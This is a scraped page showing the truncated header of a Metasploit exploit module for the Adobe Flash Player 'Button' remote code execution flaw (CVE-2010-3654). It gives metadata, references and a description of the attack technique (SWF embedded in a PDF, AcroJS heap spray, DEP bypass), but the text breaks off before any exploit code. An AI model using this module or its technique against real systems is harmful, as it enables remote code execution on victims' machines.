|
##
# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player "Button" Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the handling of certain SWF movies
within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat
are also vulnerable, as are any other applications that may embed Flash player.
Arbitrary code execution is achieved by embedding a specially crafted Flash
movie into a PDF document. An AcroJS heap spray is used in order to ensure
that the memory used by the invalid pointer issue is controlled.
NOTE: This module uses a similar DEP bypass method to that used within the
adobe_libtiff module. This method is unlikely to work across various
Windows versions due a the hardcoded syscall number.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Found being openly exploited
'Haifei Li', # PoC
'jduck' # Metasploit version
],
'Version' => '$Revision: 10857
,
'References' =>
[
['CVE', '2010-3654'],
['OSVDB', '68932'],
['BID', '44504'],
['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],
['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC
# For SWF->PDF embedding
['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
],
'DefaultOptions' =>
{
'EXIT
|
推荐
评论(0条)
